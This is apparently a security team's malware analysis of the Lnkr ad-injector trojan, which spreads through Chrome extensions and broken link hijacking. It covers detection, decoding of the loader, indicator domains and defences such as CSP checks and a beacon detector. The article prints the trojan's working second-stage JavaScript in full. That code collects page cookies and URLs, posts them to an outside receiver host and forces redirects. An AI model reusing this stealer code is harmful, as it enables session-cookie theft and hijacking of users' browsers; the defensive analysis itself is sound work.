Summary
This article analyses the Lnkr Trojan from three angles: how it is delivered, what its malicious code does once it runs, and how it can be monitored and defended against. The Trojan has a wide reach and several delivery channels, yet little has been written about it in China so far. We hope the hands-on experience summarised here is useful to those working on security detection.
I. Overview of the incident
In October 2020, Meituan's security operations platform detected requests for a malicious JavaScript file in network traffic, and the Information Security Department began incident handling as soon as the alert arrived. By examining the network environment and access logs, we traced the malicious requests to a malicious extension installed in the Chrome browser. The JavaScript it loads steals cookies and forcibly redirects users to pornographic sites and promotional links. Correlating with Meituan's threat-intelligence data showed that the extension shares the characteristics of the Lnkr Ad Injector Trojan.
This family spreads through several channels, including browser extensions and Broken Link Hijacking, and implants malicious code into pages, seriously disrupting users' browsing and stealing their data. Follow-up tracking found that a number of large Chinese Internet sites (in the Alexa global top 600) were infected, putting hundreds of millions of users at risk. Large platforms should audit the third-party sources their own systems load, as well as their internal endpoint devices, to avoid this kind of Trojan.
II. Tracing process
2.1 The security operations platform raises an alert
The Chrome sandbox detected a malicious JavaScript file and raised an alert.
The alert data shows the basic attack sequence:
- The user visits a normal page;
- the page loads an external JavaScript file (A): s3.amazonaws.com/js-static/1…
- A loads a second JavaScript file (B): //countsource.cool/18ced489204…
- B contains the malicious code and sends sensitive data such as cookies to a remote domain.
2.2 Analysing the attack path
Given the page that triggered the alert and the network environment, we ruled out traffic hijacking and XSS and suspected a browser extension or other malware on the endpoint.
Sandbox analysis of every Chrome extension on the affected device showed that the code of an extension named Vysor was malicious. The detection result was as follows:
```json
{
  "call_window_location": {
    "info": "get document.location",
    "capture": []
  },
  "call_document_createElement": {
    "info": "call document.createElement, create script element",
    "capture": [
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:INPUT",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:FIELDSET",
      "create element elementName:SCRIPT",
      "create element elementName:LINK"
    ]
  },
  "call_document_removeChild": {
    "info": "call document.removeChild",
    "capture": [
      "remove element {elementName:fieldset}",
      "remove element {elementName:fieldset}",
      "remove element {elementName:fieldset}"
    ]
  },
  "set_scriptSrcValue": {
    "info": "set script src unsafe value",
    "capture": [
      "//s3.amazonaws.com/js-static/18ced489204f8ff908.js"
    ]
  }
}
```
The extension code creates a script tag and sets its src attribute to //s3.amazonaws.com/js-static/18ced489204f8ff908.js.
2.3 Analysis of the extension's malicious code
To learn more about this group's Trojan, we analysed the extension code by hand. The code is large, chaotically structured and padded with a great deal of junk code intended to hinder analysis.
The code presets a large number of meaningless-looking strings from which it builds the payload.
These strings are transformed step by step into the statement document['createElement'] that creates the script tag; the variable docType holds the created script object.
The script object's src attribute is then set. In the addHandler method, the cl parameter (passed in as elem) contains the string "src"; cl[0].split('>').slice(2, 3) extracts that keyword, and tag is the doctype variable, i.e. the script object. In the part that constructs the src value, one constant contains a string that is partly base64:
```javascript
mawaid = '^\\%|PCQxPjwkMT5zM|y5hbWF6b25hd3Mu|? : ^ ^ \ \ \ \] +? :\\%\\.*\t'
```
The code combines this string with other preset variables through a series of conversions, eventually producing the base64 string PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM that encodes the loading address.
The base64 is decoded in the createLinkPseudo routine and a replace is applied, which yields the malicious address //s3.amazonaws.com/js-static/18ced489204f8ff908.js.
The only purpose of s3.amazonaws.com/js-static/18ced489204f8ff908.js is to load the next stage, //countsource.cool/18ced489204f8ff908.js:
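The decode step can be reproduced without the extension's obfuscation layer. The block below is an added example, not code from the extension or from Meituan's tooling: it decodes the base64 constant quoted above and shows that the decoded string uses the literal token <$1> as a separator, so a single replace of that token with "/" produces the protocol-relative loader URL. The token name is taken from the decoded bytes themselves; the padding fix-up is needed because the constant is stored unpadded.

```javascript
// Recover the Lnkr loader URL from the base64 constant found in the extension.
// Added analysis helper; the only inputs are the two strings quoted in the article.

const LNKR_URL_CONSTANT =
  "PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM";

// The constant is stored without "=" padding; restore it so strict decoders accept it.
function base64ToText(b64) {
  const padded = b64 + "=".repeat((4 - (b64.length % 4)) % 4);
  if (typeof Buffer !== "undefined") {
    return Buffer.from(padded, "base64").toString("latin1"); // Node.js
  }
  return atob(padded); // browser
}

// The decoded bytes read "<$1><$1>s3.amazonaws.com<$1>js-static<$1>18ced489204f8ff908.js":
// "<$1>" is the separator the obfuscator used in place of "/".
function decodeLnkrUrl(b64, separatorToken = "<$1>") {
  return base64ToText(b64).split(separatorToken).join("/");
}

// Protocol-relative URLs inherit the page scheme; pin one so the result can be
// fed to URL parsers, blocklists or proxy logs.
function toAbsolute(url, scheme = "https") {
  return url.startsWith("//") ? `${scheme}:${url}` : url;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodeLnkrUrl(LNKR_URL_CONSTANT));             // //s3.amazonaws.com/js-static/18ced489204f8ff908.js
  console.log(toAbsolute(decodeLnkrUrl(LNKR_URL_CONSTANT))); // https://s3.amazonaws.com/js-static/18ced489204f8ff908.js
}
```

Running it gives back exactly the address the sandbox captured in set_scriptSrcValue, which confirms that the string constant, not any runtime input, determines where the loader points.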
```javascript
(function(){var a=document.createElement("script"); a.src="//countsource.cool/18ced489204f8ff908.js"; (document.head||document.documentElement).appendChild(a)})();;
```
The content of //countsource.cool/18ced489204f8ff908.js is as follows:
```javascript
(function () {
    function initXMLhttp() {
        var xmlhttp;
        if (window.XMLHttpRequest) {
            xmlhttp = new XMLHttpRequest();
        } else {
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        return xmlhttp;
    }

    function minAjax(config) {
        if (!config.url) {
            return;
        }
        if (!config.type) {
            return;
        }
        if (!config.method) {
            config.method = true; // used as the "async" argument of XMLHttpRequest.open
        }
        if (!config.debugLog) {
            config.debugLog = false;
        }
        var sendString = [],
            sendData = config.data;
        if (typeof sendData === "string") {
            var tmpArr = String.prototype.split.call(sendData, '&');
            for (var i = 0, j = tmpArr.length; i < j; i++) {
                var datum = tmpArr[i].split('=');
                sendString.push(encodeURIComponent(datum[0]) + "=" + encodeURIComponent(datum[1]));
            }
        } else if (typeof sendData === 'object' && !(sendData instanceof String)) {
            for (var k in sendData) {
                var datum = sendData[k];
                if (Object.prototype.toString.call(datum) == "[object Array]") {
                    for (var i = 0, j = datum.length; i < j; i++) {
                        sendString.push(encodeURIComponent(k) + "[]=" + encodeURIComponent(datum[i]));
                    }
                } else {
                    sendString.push(encodeURIComponent(k) + "=" + encodeURIComponent(datum));
                }
            }
        }
        sendString = sendString.join('&');
        if (window.XDomainRequest) {
            // Legacy IE cross-domain path
            var xmlhttp = new window.XDomainRequest();
            xmlhttp.onload = function () {
                if (config.success) {
                    config.success(xmlhttp.responseText);
                }
            };
            xmlhttp.open("POST", config.url);
            xmlhttp.send(sendString);
        } else {
            var xmlhttp = initXMLhttp();
            xmlhttp.onreadystatechange = function () {
                if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                    if (config.success) {
                        config.success(xmlhttp.responseText, xmlhttp.readyState);
                    }
                } else {
                }
            };
            if (config.type == "GET") {
                xmlhttp.open("GET", config.url + "?" + sendString, config.method);
                xmlhttp.send();
            }
            if (config.type == "POST") {
                xmlhttp.open("POST", config.url, config.method);
                xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                xmlhttp.send(sendString);
            }
        }
    }

    dL();

    function dL() {
        var host = 'http://press.cdncontentdelivery.com/f';
        var config = {
            url: host + "/stats.php",
            type: "POST",
            data: {
                vbase: document.baseURI,
                vhref: location.href,
                vref: document.referrer,
                k: "Y291bnRzb3VyY2UuY29vbA==",   // base64 of "countsource.cool", the stage that loaded this file
                ck: document.cookie,               // the victim's cookies for the current page
                t: Math.floor(new Date().getTime() / 1000),
                tg: ""
            },
            success: onSuccessCallback
        };

        // Redirect the top-level window to the URL returned by the server,
        // at most once per 86400 seconds, throttled via localStorage.
        function bl(resp) {
            !function (dr) {
                function t() {
                    return !!localStorage && localStorage.getItem(a);
                }
                function e() {
                    o();
                    parent.top.window.location.href = c;
                }
                function o() {
                    var t = r + i;
                    if (localStorage) {
                        localStorage.setItem(a, t);
                    }
                }
                function n() {
                    if (t()) {
                        var o = localStorage && localStorage.getItem(a);
                        r > o && e();
                    } else e();
                }
                var a = "MenuIdentifier",
                    r = Math.floor((new Date).getTime() / 1e3),
                    c = dr,
                    i = 86400;
                n();
            }(resp);
        }

        function onSuccessCallback(response) {
            if (response && response.indexOf('http') > -1) {
                bl(response);
            }
        }

        minAjax(config);
    }
})();
```
This file is the code that actually performs the malicious behaviour. It is neither obfuscated nor encrypted and carries no junk code, so its behaviour is plain:
- read the current page's cookies (parameter ck);
- read the current page's referrer (parameter vref);
- read the current page's location (parameters vhref and vbase);
- send the collected data with XMLHttpRequest to press.cdncontentdelivery.com/f/stats.php…
- redirect via the onSuccessCallback method.
The cookies are posted to the remote receiver. If the response body contains a URL (the code only checks for the substring 'http'), onSuccessCallback passes it to bl, which stores a timestamp under the localStorage key MenuIdentifier so that the redirect fires at most once every 86400 seconds (24 hours), and then sets parent.top.window.location.href to the returned URL.
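Because the second stage posts a fixed set of form fields (vbase, vhref, vref, k, ck, t, tg) to the receiver, the beacon is easy to pick out of proxy or sandbox captures without any domain list. The block below is an added detection example, not Lnkr's code or Meituan's tooling; the three sample requests are constructed for the illustration (the intranet.example.internal host and cookie values are made up), while the receiver path, field names and the value of k come from the payload above.

```javascript
// Flag Lnkr-style cookie beacons in captured HTTP requests (Node.js).
// Added detection example; SAMPLE_REQUESTS below are constructed, not real captures.

// Field set posted by the countsource.cool second stage to /f/stats.php.
const LNKR_FIELDS = ["vbase", "vhref", "vref", "k", "ck", "t", "tg"];

function parseFormBody(body) {
  const fields = {};
  for (const pair of body.split("&")) {
    if (!pair) continue;
    const [rawKey, rawValue = ""] = pair.split("=");
    fields[decodeURIComponent(rawKey)] = decodeURIComponent(rawValue.replace(/\+/g, " "));
  }
  return fields;
}

// Returns a finding object for a beacon, or null for anything else.
function classifyRequest(req) {
  if (req.method !== "POST" || !req.body) return null;
  const fields = parseFormBody(req.body);
  // Require the complete field set so ordinary forms that happen to have a "t" or "k" do not match.
  if (!LNKR_FIELDS.every((name) => name in fields)) return null;

  // "k" carries the base64 name of the domain that served the payload.
  const loaderDomain = Buffer.from(fields.k, "base64").toString("latin1");
  const cookieNames = fields.ck
    .split(";")
    .map((c) => c.trim().split("=")[0])
    .filter(Boolean);

  return {
    receiver: new URL(req.url).host,
    victimPage: fields.vhref,
    loaderDomain,
    cookieLeaked: fields.ck.length > 0,
    cookieNames, // names only: do not copy session values into alert logs
  };
}

function scan(requests) {
  return requests.map(classifyRequest).filter(Boolean);
}

// Constructed sample traffic: one beacon, one legitimate login POST, one GET.
const SAMPLE_REQUESTS = [
  {
    method: "POST",
    url: "http://press.cdncontentdelivery.com/f/stats.php",
    body:
      "vbase=https%3A%2F%2Fintranet.example.internal%2Forders" +
      "&vhref=https%3A%2F%2Fintranet.example.internal%2Forders%3Fid%3D42" +
      "&vref=&k=Y291bnRzb3VyY2UuY29vbA%3D%3D" +
      "&ck=sessionid%3Dabc123%3B%20csrftoken%3Dxyz&t=1603000000&tg=",
  },
  { method: "POST", url: "https://intranet.example.internal/api/login", body: "user=alice&password=hunter2" },
  { method: "GET", url: "https://intranet.example.internal/orders?id=42", body: "" },
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scan(SAMPLE_REQUESTS), null, 2));
}
```

The matcher keys on the field set rather than on press.cdncontentdelivery.com, so it keeps working when the operators rotate receiver domains, and decoding k tells the analyst which loader domain to add to the blocklist.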
2.4 Extending the investigation with the discovered IoCs
Pivoting on the features above, we found a large number of Lnkr-related domain names and extensions, some of which do not appear in known threat intelligence. Further analysis showed that mobile devices also triggered the malicious requests.
We also found that many large Chinese sites reference Lnkr resources directly from their own pages. When a user visits such a site, the cookies are sent straight to the attacker, which is a very high risk. Where a site loads such a resource, the likely cause is Broken Link Hijacking: the page still references a resource on a domain that has since expired, and the attacker has re-registered that domain and now serves malicious content from the old path.
III. Summary
3.1 Malicious domain names
The malicious domain names found during detection:
- mirextpro.com
- browfileext.com
- nextextlink.com
- lisegreen.biz
- makesure.biz
- clipsold.com
- comtakelink.xyz
- protesidenext.com
- promfflinkdev.com
- rayanplug.xyz
- countsource.cool
- blancfox.com
- skipush1.bbn.com.cn
- donewrork.org
- loungesrc.net
- higedev.cool
- s3.amazonaws.com/cashe-js/
- s3.amazonaws.com/js-cache/
- s3.amazonaws.com/jsfile/
- cdngateway.net (receives stolen cookies)
- sslproviders.net (receives stolen cookies)
- cdncontentdelivery.com (receives stolen cookies)
3.2 Malicious extensions
Extensions carrying Lnkr Trojan features were found; screenshots of some of them:
IV. Reflection
What harm does the Lnkr Trojan cause?
cdngateway.net, one of the Trojan's core domains, ranks around 8900 in global domain traffic, and 65.48% of that traffic arrives from external websites, which shows how wide its reach is and how many applications and users it affects.
This type of Trojan harms both external users and internal employees.
For external users: if an enterprise does not strictly control the third-party resources its pages load, the attacker's infrastructure uses Broken Link Hijacking to implant malicious code through those resource loads, seriously damaging user experience, information security and the company's image.
For internal staff: traditional endpoint security products such as antivirus and EDR do not identify such malicious extensions well. By distributing malicious browser extensions the attacker controls the employee's browser and makes it load remote malicious resources. Beyond ad injection, this gives a more stable foothold than other attacks on the browser. Among the malicious requests blocked by CSP in our history we also found that, besides cookies, the malicious code stole page text, which on internal enterprise platforms is very likely to include large amounts of user, order and other sensitive information.
How can this kind of Trojan implant be detected?
Static analysis of malicious browser extensions is expensive: the payload that triggers the malicious request is assembled through long chains of conversions, string splicing and regular-expression matching, and buried in large amounts of meaningless code. Dynamic analysis has its own obstacle: the extension code calls Chrome's background APIs, which fail or throw in an ordinary sandbox, and many malicious actions only start building the payload after a specific event fires, for example chrome.tabs.onUpdated.
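One way around both obstacles is to run the extension's background script against a recording chrome.* shim that tolerates the API calls and lets the analyst fire the gating events by hand. The block below is an added illustration of that approach, not Meituan's sandbox: the shim covers only the handful of APIs needed here, the event names and callback shapes follow the public Chrome extension API, and sampleBackgroundScript is a constructed stand-in for an extension whose payload path is reached only from a tabs.onUpdated "complete" event (the victim.example URL is made up).

```javascript
// Minimal recording chrome.* shim for dynamic analysis of extension background code.
// Added example; covers only the API surface this illustration needs.

function makeEvent(name, log) {
  const listeners = [];
  return {
    addListener(fn) { log.push(`${name}.addListener`); listeners.push(fn); },
    removeListener(fn) { const i = listeners.indexOf(fn); if (i >= 0) listeners.splice(i, 1); },
    hasListener(fn) { return listeners.includes(fn); },
    // Analyst-only helper: deliver a synthetic event to every registered listener.
    _fire(...args) { for (const fn of [...listeners]) fn(...args); },
  };
}

function makeChromeShim() {
  const log = [];
  // Wrap an implementation so every call is logged with its JSON-serialisable arguments.
  const record = (name, impl) => (...args) => {
    log.push(`${name}(${JSON.stringify(args)})`);
    return impl ? impl(...args) : undefined;
  };
  const chrome = {
    runtime: {
      id: "sandbox-extension-id",
      getManifest: record("runtime.getManifest", () => ({ manifest_version: 2, name: "sandbox" })),
      onMessage: makeEvent("runtime.onMessage", log),
      onInstalled: makeEvent("runtime.onInstalled", log),
      lastError: undefined,
    },
    tabs: {
      onUpdated: makeEvent("tabs.onUpdated", log),
      query: record("tabs.query", (_query, cb) => cb && cb([{ id: 1, url: "https://victim.example/" }])),
      executeScript: record("tabs.executeScript", (_tabId, _details, cb) => cb && cb([])),
    },
    cookies: {
      getAll: record("cookies.getAll", (_details, cb) => cb && cb([])),
    },
    storage: {
      local: {
        get: record("storage.local.get", (_keys, cb) => cb && cb({})),
        set: record("storage.local.set", (_items, cb) => cb && cb()),
      },
    },
  };
  return { chrome, log };
}

// Constructed stand-in for an extension background script: the injection only
// happens once a tab reports status "complete", so a sandbox that never fires
// tabs.onUpdated sees nothing.
function sampleBackgroundScript(chrome) {
  const injected = [];
  chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
    if (changeInfo.status !== "complete") return;
    chrome.tabs.executeScript(tabId, { code: "/* inject loader */" }, () => {
      injected.push(tab.url);
    });
  });
  return injected;
}

function runAnalysis() {
  const { chrome, log } = makeChromeShim();
  const injected = sampleBackgroundScript(chrome);
  const injectedBeforeEvent = injected.length; // nothing yet: the payload path is event-gated
  const tab = { id: 1, url: "https://victim.example/" };
  chrome.tabs.onUpdated._fire(1, { status: "loading" }, tab);  // ignored by the listener
  chrome.tabs.onUpdated._fire(1, { status: "complete" }, tab); // reaches the payload
  return { injectedBeforeEvent, injected, log };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(runAnalysis());
}
```

The recorded log shows which APIs the code touched and in what order, and the analyst can replay the same script with different synthetic events (page loads, cookie changes, messages) to enumerate the code paths that static inspection of the obfuscated source would miss.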
The following measures help detect and defend against malicious browser extensions:
- Do not install extensions that are not available in the Chrome Web Store (in-house extensions excepted);
- review the permissions requested in the extension's manifest.json; cookies, tabs, webRequest and similar permissions are sensitive;
- use Content Security Policy (CSP) to block or monitor the requests a page initiates, and combine static and dynamic analysis to judge the behaviour of JavaScript files;
- scan browser extensions periodically with a browser sandbox and EDR;
- build network-layer detection so that malicious requests can be handled promptly.
To check whether the business system itself loads malicious resources:
- strictly control the third-party resources the system loads;
- block or monitor page-triggered requests with Content Security Policy (CSP).
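Whether a CSP actually stops this chain depends on how tightly script-src and connect-src are written: a policy that allows any https: script still lets both loader stages in, and an open connect-src lets the cookie beacon out. The block below is an added example, not from the original article: a simplified CSP source-expression matcher (host sources with optional scheme, wildcard subdomain, port and path; 'self'; scheme sources; nonces, hashes and 'strict-dynamic' are out of scope) applied to the three URLs from this incident. The intranet.example.internal page, the static.example.internal host and both policies are constructed for the illustration.

```javascript
// Evaluate whether a CSP would have blocked the Lnkr loader stages and beacon (Node.js).
// Added example; the matcher is a simplified reading of the CSP host-source algorithm.

const DEFAULT_PORT = { "http:": "80", "https:": "443" };

function parsePolicy(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

function hostMatches(pattern, host) {
  const p = pattern.toLowerCase(), h = host.toLowerCase();
  if (p.startsWith("*.")) {
    const suffix = p.slice(1); // ".example.com"
    return h.endsWith(suffix) && h.length > suffix.length;
  }
  return p === h;
}

// Does one source expression match the URL, given the protected page's origin?
function sourceMatches(source, url, page) {
  const s = source.toLowerCase();
  if (s === "'self'") return url.origin === page.origin;
  if (s.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes: never a URL match
  if (s === "*") return true;         // simplified: the spec excludes data:/blob:/filesystem:
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme-source such as https:

  // host-source: [scheme://]host[:port][/path]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(source);
  if (!m) return false;
  const scheme = m[1] ? m[1].toLowerCase() + ":" : null;
  const [, , host, port, path] = m;

  if (scheme) {
    if (url.protocol !== scheme) return false;
  } else if (url.protocol !== page.protocol && !(page.protocol === "http:" && url.protocol === "https:")) {
    return false; // scheme-less sources inherit the page scheme (http pages may also use https)
  }
  if (!hostMatches(host, url.hostname)) return false;
  const urlPort = url.port || DEFAULT_PORT[url.protocol] || "";
  if (port && port !== "*" && port !== urlPort) return false;
  if (path) {
    if (path.endsWith("/")) { if (!url.pathname.startsWith(path)) return false; }
    else if (url.pathname !== path) return false;
  }
  return true;
}

// Fall back to default-src when the directive is absent; no policy at all means allow.
function effectiveSources(directives, name) {
  return directives[name] || directives["default-src"] || ["*"];
}

function allowedBy(policy, directive, urlString, pageUrl) {
  const page = new URL(pageUrl);
  const url = new URL(urlString, pageUrl); // resolves protocol-relative "//host/path" against the page
  return effectiveSources(parsePolicy(policy), directive).some((src) => sourceMatches(src, url, page));
}

const checkScriptLoad = (policy, url, pageUrl) => allowedBy(policy, "script-src", url, pageUrl);
const checkConnect = (policy, url, pageUrl) => allowedBy(policy, "connect-src", url, pageUrl);

// Incident URLs from the article, and a constructed victim page.
const PAGE = "https://intranet.example.internal/orders";
const LOADER_URL = "//s3.amazonaws.com/js-static/18ced489204f8ff908.js";
const SECOND_STAGE_URL = "//countsource.cool/18ced489204f8ff908.js";
const BEACON_URL = "http://press.cdncontentdelivery.com/f/stats.php";

// Weak: any https: script may run and the page may connect anywhere.
const WEAK_POLICY = "default-src 'self'; script-src 'self' https:; connect-src *";
// Hardened: own origin plus one named static host; violations are reported.
const STRICT_POLICY =
  "default-src 'self'; script-src 'self' https://static.example.internal; connect-src 'self'; report-uri /csp-report";

function audit(policy, pageUrl = PAGE) {
  return {
    loaderBlocked: !checkScriptLoad(policy, LOADER_URL, pageUrl),
    secondStageBlocked: !checkScriptLoad(policy, SECOND_STAGE_URL, pageUrl),
    beaconBlocked: !checkConnect(policy, BEACON_URL, pageUrl),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("weak  :", audit(WEAK_POLICY));
  console.log("strict:", audit(STRICT_POLICY));
}
```

The audit shows the point the recommendations above make: only a policy that names the permitted script hosts and confines connect-src blocks all three stages, and report-uri turns the blocked requests into the monitoring signal mentioned in the measures list.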
Conclusion
Underground groups use these Trojans to drive traffic and steal user data, which endangers users and damages the affected site's image. HTTPS removes the risk of a link being hijacked on the path, but the security of the client environment itself, and the assurance that user data is reliable and has not been tampered with, still need further protection. We hope this article offers some help or inspiration.
About Meituan Information Security Department